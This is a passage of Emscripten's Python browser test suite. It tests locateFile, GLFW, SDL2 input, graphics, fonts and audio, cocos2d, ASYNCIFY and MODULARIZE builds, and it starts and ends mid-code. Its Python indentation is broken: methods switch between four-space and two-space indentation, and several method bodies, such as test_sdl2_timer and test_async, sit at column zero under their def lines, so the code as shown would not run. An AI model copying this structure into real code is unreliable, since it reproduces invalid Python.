assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
''')
        create_test_file('data.txt', 'load me right before...')
        create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
        # NOTE(review): the open() handle passed as stdout is not explicitly
        # closed; run_process presumably owns it — confirm before changing.
        self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
        # put pre.js first, then the file packager data, so locateFile is there for the file loading code
        self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)])
        ensure_dir('sub')
        # Move the companion files into sub/ so only locateFile can find them.
        if wasm:
            shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
        else:
            shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
        shutil.move('test.data', os.path.join('sub', 'test.data'))
        self.run_browser('page.html', None, '/report_result?1')
        # alternatively, put locateFile in the HTML
        print('in html')
        create_test_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
        def in_html(expected, args=None):
            # Fix: use None instead of a mutable default list ([]), which
            # would be shared across calls.
            args = args or []
            self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP', '-s', 'ASSERTIONS', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args)
            if wasm:
                shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
            else:
                shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
            self.run_browser('page.html', None, '/report_result?' + expected)
        in_html('1')
        # verify that the mem init request succeeded in the latter case
        if not wasm:
            create_test_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
''')
            in_html('200')
@requires_graphics_hardware
@parameterized({
    'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
    'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
    """GLFW3 with and without a GL client API, across build configurations."""
    configurations = ([], ['-s', 'LEGACY_GL_EMULATION'], ['-Os', '--closure', '1'])
    for extra in configurations:
        print(extra)
        flags = ['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + list(extra)
        self.btest(path_from_root('tests', 'glfw3.c'), args=flags, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
    """GLFW event handling for both GLFW 2 and GLFW 3 backends."""
    for version in ('2', '3'):
        flags = ['-s', 'USE_GLFW=' + version, "-DUSE_GLFW=" + version, '-lglfw', '-lGL']
        self.btest(path_from_root('tests', 'glfw_events.c'), args=flags, expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
    """SDL2_image loading a JPEG via --preload-file, at two mount points."""
    # load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
    destinations = (
        ('screenshot.jpg', '/', 'screenshot.jpg'),
        ('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg'),
    )
    for mem in (0, 1):
        for dest, dirname, basename in destinations:
            cmd = [
                path_from_root('tests', 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
                '--preload-file', dest,
                '-DSCREENSHOT_DIRNAME="' + dirname + '"',
                '-DSCREENSHOT_BASENAME="' + basename + '"',
                '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins',
            ]
            self.compile_btest(cmd)
            self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
    """SDL2_image JPEG decoding with a .jpeg extension."""
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
    cmd = [
        path_from_root('tests', 'sdl2_image.c'), '-o', 'page.html',
        '--preload-file', 'screenshot.jpeg',
        '-DSCREENSHOT_DIRNAME="/"',
        '-DSCREENSHOT_BASENAME="screenshot.jpeg"',
        '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins',
    ]
    self.compile_btest(cmd)
    self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
    """SDL2_IMAGE_FORMATS: build with only png, then only jpg, decoder support."""
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
    # png-only build; expected result differs from jpg (512 vs 600).
    self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
                                                     '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
    # jpg-only build.
    self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
                                                     '-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
    """SDL2 keyboard events: pre.js synthesizes keydown/keypress/keyup via
    KeyboardEvent and polls the compiled _one() every frame."""
    create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
    # _one must be exported so pre.js can call it.
    self.compile_btest([path_from_root('tests', 'sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
    self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
    """SDL2 text input: pre.js synthesizes keypress events on document.body
    and polls the compiled _one() every frame."""
    create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
    self.compile_btest([path_from_root('tests', 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
    self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
    """SDL2 mouse events: pre.js synthesizes mousedown/mouseup/mousemove on
    the canvas, offset by the canvas position."""
    create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
    self.compile_btest([path_from_root('tests', 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
    self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
    """SDL2 mouse coordinates with a canvas that is absolutely positioned
    inside an offset container: events use page coordinates (no canvas
    offset added), and the runtime must map them correctly."""
    create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
    # Hand-written page: the canvas sits inside a container offset by 5px,
    # so event coordinates and canvas coordinates differ.
    create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
    self.compile_btest([path_from_root('tests', 'sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
    self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
    """SDL2 in a pthreads build with main proxied to a pthread."""
    flags = ['-s', 'USE_PTHREADS', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD']
    self.btest('sdl2_threads.c', expected='4', args=flags)
@requires_graphics_hardware
def test_sdl2glshader(self):
    """SDL2 + GL shaders under legacy GL emulation; reftest against sdlglshader.png."""
    self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION'])
    self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
    """Reftest: a blank SDL2 canvas."""
    self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
    """Reftest: palettized SDL2 canvas rendering."""
    self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
    """Reftest: drawing to the SDL2 canvas twice."""
    self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
    """Reftest: SDL2_gfx primitives."""
    flags = ['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2']
    self.btest('sdl2_gfx.cpp', args=flags, reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
    """Palettized SDL2 canvas with a color channel selected via argv
    (-r/-g/-b passed through Module['arguments'])."""
    create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
    create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
    create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
    self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
    self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
    self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
    """SDL2 software surface with enlarged initial memory."""
    flags = ['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB']
    self.btest('sdl2_swsurface.c', expected='1', args=flags)
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
    """emscripten_run_preload_plugins on a preloaded image (extension hidden as .not)."""
    # load an image file, get pixel data.
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
    flags = ['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2']
    self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=flags, manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
    """emscripten_run_preload_plugins_data on raw image bytes."""
    # load an image file, get pixel data.
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
    flags = ['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2']
    self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=flags, manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
    """SDL2 rendering proxied to a worker; post-build hook injects reftest
    code that runs after requestAnimationFrames settle, before window.close."""
    def post():
        html = open('test.html').read()
        html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
        create_test_file('test.html', html)
    create_test_file('data.txt', 'datum')
    self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING'], manual_reference=True, post_build=post)
  def test_sdl2_pumpevents(self):
    # key events should be detected using SDL_PumpEvents
    # pre.js provides a keydown() helper that synthesizes DOM KeyboardEvents.
    create_test_file('pre.js', '''
      function keydown(c) {
        var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
        document.dispatchEvent(event);
      }
    ''')
    self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
  @requires_graphics_hardware
  def test_sdl2_gl_read(self):
    # SDL, OpenGL, readPixels
    # Compiled manually (not via btest) so the browser run can be driven directly.
    self.compile_btest([path_from_root('tests', 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
    self.run_browser('something.html', '.', '/report_result?1')
  @requires_graphics_hardware
  def test_sdl2_glmatrixmode_texture(self):
    # glMatrixMode(GL_TEXTURE) under LEGACY_GL_EMULATION, checked via reftest.
    self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
               args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
               message='You should see a (top) red-white and (bottom) white-red image.')
  @requires_graphics_hardware
  def test_sdl2_gldrawelements(self):
    # glDrawElements with the various primitive modes under LEGACY_GL_EMULATION.
    self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
               args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
               message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
  @requires_graphics_hardware
  def test_sdl2_fog_simple(self):
    # GL fog (simple mode) over a preloaded image, under LEGACY_GL_EMULATION.
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
               args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
               message='You should see an image with fog.')
  @requires_graphics_hardware
  def test_sdl2_fog_negative(self):
    # GL fog with negative parameters, under LEGACY_GL_EMULATION.
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
               args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
               message='You should see an image with fog.')
  @requires_graphics_hardware
  def test_sdl2_fog_density(self):
    # GL fog density mode, under LEGACY_GL_EMULATION.
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
               args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
               message='You should see an image with fog.')
  @requires_graphics_hardware
  def test_sdl2_fog_exp2(self):
    # GL fog in GL_EXP2 mode, under LEGACY_GL_EMULATION.
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
               args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
               message='You should see an image with fog.')
  @requires_graphics_hardware
  def test_sdl2_fog_linear(self):
    # GL fog in GL_LINEAR mode; allows 1 unit of per-pixel slack in the reftest.
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
               args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
               message='You should see an image with fog.')
  def test_sdl2_unwasteful(self):
    # SDL2 at -O1; the test reports 1 on success.
    self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
  def test_sdl2_canvas_write(self):
    # Writing pixels to the canvas through SDL2; reports 0 on success.
    self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
  @requires_graphics_hardware
  def test_sdl2_gl_frames_swap(self):
    # GL frame swapping via SDL2, proxied to a worker. The post step removes
    # the automatic postRun reftest hook so the comparison happens on a later
    # frame rather than the very first one.
    def post_build(*args):
      self.post_manual_reftest(*args)
      html = open('test.html').read()
      html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
      assert html != html2
      create_test_file('test.html', html2)
    self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
  @requires_graphics_hardware
  def test_sdl2_ttf(self):
    # SDL2_ttf text rendering with an embedded TrueType font.
    shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
    self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
               args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
               message='You should see colorful "hello" and "world" in the window')
  @requires_graphics_hardware
  def test_sdl2_ttf_rtl(self):
    # SDL2_ttf right-to-left (Arabic) text shaping with an embedded font.
    shutil.copy2(path_from_root('tests', 'third_party', 'notofont', 'NotoNaskhArabic-Regular.ttf'), self.get_dir())
    self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
               args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
               message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
  def test_sdl2_custom_cursor(self):
    # Custom mouse cursor loaded from a preloaded .bmp file.
    shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
    self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
  def test_sdl2_misc(self):
    # Miscellaneous SDL2 API coverage; expects a clean exit code of 0.
    self.btest_exit('sdl2_misc.c', 0, args=['-s', 'USE_SDL=2'])
  @disabled('https://github.com/emscripten-core/emscripten/issues/13101')
  def test_sdl2_misc_main_module(self):
    # Same as test_sdl2_misc but built as a MAIN_MODULE (currently disabled).
    self.btest_exit('sdl2_misc.c', 0, args=['-s', 'USE_SDL=2', '-s', 'MAIN_MODULE'])
  def test_sdl2_misc_via_object(self):
    # Same test, but compiled to an object file first and then linked, to
    # check that USE_SDL=2 works across a separate compile + link step.
    self.run_process([EMCC, '-c', path_from_root('tests', 'sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
    self.compile_btest(['test.o', '-s', 'EXIT_RUNTIME', '-s', 'USE_SDL=2', '-o', 'test.html'])
    self.run_browser('test.html', '...', '/report_result?exit:0')
  # SDL2_mixer WAV playback, requested either via -s settings or via -l libraries.
  @parameterized({
    'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
    'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
  })
  @requires_sound_hardware
  def test_sdl2_mixer_wav(self, flags):
    shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
    self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)
  # SDL2_mixer music playback for each supported format; the format list is
  # passed through SDL2_MIXER_FORMATS and the matching Mix_Init flag via -D.
  @parameterized({
    'wav': ([], '0', 'the_entertainer.wav'),
    'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
    'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
  })
  @requires_sound_hardware
  def test_sdl2_mixer_music(self, formats, flags, music_name):
    shutil.copyfile(path_from_root('tests', 'sounds', music_name), music_name)
    self.btest('sdl2_mixer_music.c', expected='1', args=[
      '--preload-file', music_name,
      '-DSOUND_PATH=' + json.dumps(music_name),
      '-DFLAGS=' + flags,
      '-s', 'USE_SDL=2',
      '-s', 'USE_SDL_MIXER=2',
      '-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
      '-s', 'INITIAL_MEMORY=33554432'
    ])
  @no_wasm_backend('cocos2d needs to be ported')
  @requires_graphics_hardware
  def test_cocos2d_hello(self):
    # Cocos2d-x hello-world sample; preloads the sample's Resources directory
    # at the filesystem root (the trailing '@').
    cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
    preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
    self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
               args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
                     '--preload-file', preload_file, '--use-preload-plugins',
                     '-Wno-inconsistent-missing-override'],
               message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2', '-s', 'ASYNCIFY'])
  @requires_threads
  def test_async_in_pthread(self):
    # ASYNCIFY operations running on a pthread (main proxied to a pthread).
    self.btest('browser/async.cpp', '1', args=['-s', 'ASYNCIFY', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-g'])
  def test_async_2(self):
    # Error.stackTraceLimit default to 10 in chrome but this test relies on more
    # than 40 stack frames being reported.
    create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
    self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js', '-s', 'ASYNCIFY'])
  def test_async_virtual(self):
    # ASYNCIFY through virtual calls, at -O0 and -O3.
    for opts in [0, 3]:
      print(opts)
      self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling', '-s', 'ASYNCIFY'])
  def test_async_virtual_2(self):
    # ASYNCIFY through virtual calls with ASSERTIONS and SAFE_HEAP enabled.
    for opts in [0, 3]:
      print(opts)
      self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-profiling', '-s', 'ASYNCIFY'])
  # Test async sleeps in the presence of invoke_* calls, which can happen with
  # longjmp or exceptions.
  @parameterized({
    'O0': ([],), # noqa
    'O3': (['-O3'],), # noqa
  })
  def test_async_longjmp(self, args):
    self.btest('browser/async_longjmp.cpp', '2', args=args + ['-s', 'ASYNCIFY'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts), '-s', 'ASYNCIFY'])
  @requires_sound_hardware
  def test_sdl_audio_beep_sleep(self):
    # SDL audio combined with asyncified sleeps; given a longer timeout since
    # the test plays audio in real time.
    self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP', '-lSDL', '-s', 'ASYNCIFY'], timeout=90)
  def test_mainloop_reschedule(self):
    # Rescheduling the main loop while asyncified.
    self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-s', 'ASYNCIFY'])
  def test_mainloop_infloop(self):
    # A main loop containing an infinite loop, handled via ASYNCIFY.
    self.btest('mainloop_infloop.cpp', '1', args=['-s', 'ASYNCIFY'])
  def test_async_iostream(self):
    # C++ iostream output interleaved with asyncified operations.
    self.btest('browser/async_iostream.cpp', '1', args=['-s', 'ASYNCIFY'])
  # Test an async return value. The value goes through a custom JS library
  # method that uses asyncify, and therefore it needs to be declared in
  # ASYNCIFY_IMPORTS.
  # To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
  @parameterized({
    'normal': (['-s', 'ASYNCIFY_IMPORTS=["sync_tunnel"]'],), # noqa
    'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
    'nothing': (['-DBAD'],), # noqa
    'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
    'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
  })
  def test_async_returnvalue(self, args):
    # The 'response' variant reads the import list from a file via '@'.
    if '@' in str(args):
      create_test_file('filey.txt', '["sync_tunnel"]')
    self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', path_from_root('tests', 'browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS'])
  def test_async_stack_overflow(self):
    # A tiny ASYNCIFY_STACK_SIZE should trigger the stack-overflow handling path.
    self.btest('browser/async_stack_overflow.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
  def test_async_bad_list(self):
    # An ASYNCIFY_ONLY list naming a nonexistent function.
    self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=["waka"]', '--profiling'])
  # Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
  def test_minimal_runtime_modularize(self):
    self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE', '-s', 'MINIMAL_RUNTIME'])
    self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure', '1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
